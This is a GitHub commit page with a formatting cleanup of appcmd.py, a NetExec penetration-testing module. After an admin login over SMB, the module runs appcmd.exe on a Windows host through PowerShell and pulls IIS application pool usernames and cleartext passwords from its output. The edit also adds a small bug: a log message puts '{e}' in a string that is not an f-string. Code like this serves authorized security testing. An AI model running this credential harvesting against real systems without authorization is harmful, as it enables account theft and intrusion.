clean up appcmd.py

Pennyw0rth · Sep 22, 2023 · 76bf3be · 76bf3be
1 parent 9ecb07c
commit 76bf3be
Showing 1 changed file with 10 additions and 16 deletions.
diff --git a/nxc/modules/appcmd.py b/nxc/modules/appcmd.py
@@ -1,16 +1,15 @@
 #!/usr/bin/env python3
 # -*- coding: utf-8 -*-
 class NXCModule:
-
     """
     Checks for credentials in IIS Application Pool configuration files using appcmd.exe.
 
     Module by Brandon Fisher @shad0wcntr0ller
     """
 
-    name = 'iis'
+    name = "iis"
     description = "Checks for credentials in IIS Application Pool configuration files using appcmd.exe"
-    supported_protocols = ['smb']
+    supported_protocols = ["smb"]
     opsec_safe = True
     multiple_hosts = True
 
@@ -24,27 +23,24 @@ def on_admin_login(self, context, connection):
         self.check_appcmd(context, connection)
 
     def check_appcmd(self, context, connection):
-
-        if not hasattr(connection, 'has_run'):
+        if not hasattr(connection, "has_run"):
             connection.has_run = False
 
-
         if connection.has_run:
             return
 
         connection.has_run = True
 
-
         try:
-            connection.conn.listPath('C$', '\\Windows\\System32\\inetsrv\\appcmd.exe')
+            connection.conn.listPath("C$", "\\Windows\\System32\\inetsrv\\appcmd.exe")
             self.execute_appcmd(context, connection)
-        except:
-            context.log.fail("appcmd.exe not found, this module is not applicable.")
+        except Exception as e:
+            context.log.fail("appcmd.exe not found, this module is not applicable - {e}")
             return
 
     def execute_appcmd(self, context, connection):
-        command = 'powershell -c "C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*"'
-        context.log.info('Checking For Hidden Credentials With Appcmd.exe')
+        command = "powershell -c 'C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*'"
+        context.log.info("Checking For Hidden Credentials With Appcmd.exe")
         output = connection.execute(command, True)
 
         lines = output.splitlines()
@@ -55,14 +51,13 @@ def execute_appcmd(self, context, connection):
         credentials_set = set()
 
         for line in lines:
-            if 'APPPOOL.NAME:' in line:
-                apppool_name = line.split('APPPOOL.NAME:')[1].strip().strip('"')
+            if "APPPOOL.NAME:" in line:
+                apppool_name = line.split("APPPOOL.NAME:")[1].strip().strip('"')
             if "userName:" in line:
                 username = line.split("userName:")[1].strip().strip('"')
             if "password:" in line:
                 password = line.split("password:")[1].strip().strip('"')
 
-
             if apppool_name and username is not None and password is not None:  
                 current_credentials = (apppool_name, username, password)
 
@@ -76,7 +71,6 @@ def execute_appcmd(self, context, connection):
                         else:
                             context.log.highlight(f"Username: {username}, Password: {password}")
 
-
                 username = None
                 password = None
                 apppool_name = None